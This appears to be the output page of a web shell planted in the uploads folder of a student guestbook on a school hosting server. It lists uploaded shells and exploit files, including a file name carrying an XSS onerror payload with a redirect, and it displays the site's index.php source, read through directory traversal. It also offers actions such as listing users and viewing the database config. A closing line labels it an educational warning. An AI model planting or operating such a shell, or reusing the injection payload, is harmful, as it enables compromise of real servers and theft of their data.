🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../klas4s23.mid-ica.nl/public_html/index.php

<?php
// required headers
header("Access-Control-Allow-Origin: *");

$name = $_SERVER['SERVER_NAME'];
?>
<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <!--<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" media="screen">-->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
          rel="stylesheet">
    <!-- jQuery library -->
    <!--<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>-->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <!-- Bootstrap JavaScript -->
    <!--<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>-->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootbox.js/5.5.2/bootbox.min.js"></script>
    <!--Fav Icons-->
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="manifest" href="/site.webmanifest.json">

    <title><?=$name?></title>

    <script>
        document.addEventListener("DOMContentLoaded",function(){
            let url = 'https://klassenweb.mid-ica.nl/students/get/api';
            //let url = 'http://klassenweb.markkors.nl/students/get/api';

            fetch(url).then(function(response) {
                return response.json();
            }).then(function(data) {
                //console.log(data)
                let domain_students = data.students.filter(function (item) {
                    //return item.vps_domain=='student4i0.mid-ica.nl';
                    return item.vps_domain=='<?=$name?>';
                });
                let fields = Object.keys(domain_students[0]);
                let table = document.querySelector("table");
                generateTable(table,domain_students);
            });

            document.addEventListener("keypress",show_bootbox);

            function show_bootbox(event) {
                let postdata = {"search":null, "action":"get_students"};

                document.removeEventListener("keypress",show_bootbox)
                bootbox.prompt({
                    title: "search",
                    message: "* = show all",
                    value: event.key,
                    callback: function(result) {
                        if(result!=null) {
                            postdata.search=result;
                            console.log(JSON.stringify(postdata));
                            fetch(url, {
                                method: 'POST', // or 'PUT'
                                cache: "no-cache",
                                body: JSON.stringify(postdata)
                            }).then(response => response.json()).then(data => {

                                let domain_students = data.students.filter(function (item) {
                                    //return item.vps_domain=='student4i0.mid-ica.nl';
                                    return item.vps_domain=='<?=$name?>';
                                });
                                let fields = Object.keys(domain_students[0]);
                                let table = document.querySelector("table");
                                cleanTable(table);
                                generateTable(table,domain_students);
                            }).catch((error) => {
                                    console.log('Error:', error);
                            }).finally(() => {
                                document.addEventListener("keypress",show_bootbox);
                            });
                        }
                    }
                });
            }
        });

        function generateTable(table,data) {
            generateTableHead(table,data);
            generateTableBody(table,data);
        }

        function cleanTable(table) {
            while(table.firstChild) {
                table.removeChild(table.firstChild);
            }
        }

        function generateTableHead(table, data) {
            let fields = Object.keys(data[0]);
            let thead = table.createTHead();
            let row = thead.insertRow();

            // first column is the weblocation
            let th = document.createElement("th");
            th.setAttribute("scope","col");
            let text = document.createTextNode("Web");
            th.appendChild(text);
            row.appendChild(th);

            for (let key of fields) {
                if(key === 'number') {
                    let th = document.createElement("th");
                    th.setAttribute("scope","col");
                    let text = document.createTextNode("Nummer");
                    th.appendChild(text);
                    row.appendChild(th);
                }

                if(key === 'firstname') {
                    let th = document.createElement("th");
                    th.setAttribute("scope","col");
                    let text = document.createTextNode("Naam");
                    th.appendChild(text);
                    row.appendChild(th);

                }
                if(key === 'group') {
                    let th = document.createElement("th");
                    th.setAttribute("scope","col");
                    let text = document.createTextNode("Groep");
                    th.appendChild(text);
                    row.appendChild(th);
                }

            }
        }

        function generateTableBody(table, data) {
            let tbody = table.createTBody();
            document.getElementById("studentcount").innerText = `${data.length} studenten`
            for (let element of data) {
                let row = tbody.insertRow();

                // first column is the weblocation
                let cell = row.insertCell();
                let a = document.createElement("a");
                a.href = `http://${element.number}.${element.vps_domain}`;
                a.setAttribute("target","_blank");
                let s = document.createElement("span");
                s.className="material-icons"
                let text = document.createTextNode('language');
                s.appendChild(text);
                a.appendChild(s)
                cell.appendChild(a);

                for (key in element) {
                    if(key === 'number') {
                        let cell = row.insertCell();
                        let text = element[key] ;
                        let tn = document.createTextNode(text);
                        cell.appendChild(tn);
                    }
                    if(key === 'firstname') {
                        let cell = row.insertCell();
                        let text = `${element['firstname']} ${element['middlename']} ${element['lastname']}` ;
                        let tn = document.createTextNode(text);
                        cell.appendChild(tn);
                        continue;
                    }
                    if(key === 'group') {
                        let cell = row.insertCell();
                        let text = element[key] ;
                        let tn = document.createTextNode(text);
                        cell.appendChild(tn);
                    }

                }
            }
        }


    </script>
</head>
<body>

<header>
    <!-- Navbar -->
    <nav class="navbar navbar-light bg-light">
        <span class="navbar-brand mb-0 h1"><img style="width: 200px" src="logo_small_75.png"></span>
        <span><?=$name?></span>
        <span id="studentcount"></span>
    </nav>
</header>

<div id="container">
    <table class="table table-striped"></table>
</div>

<script>

</script>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!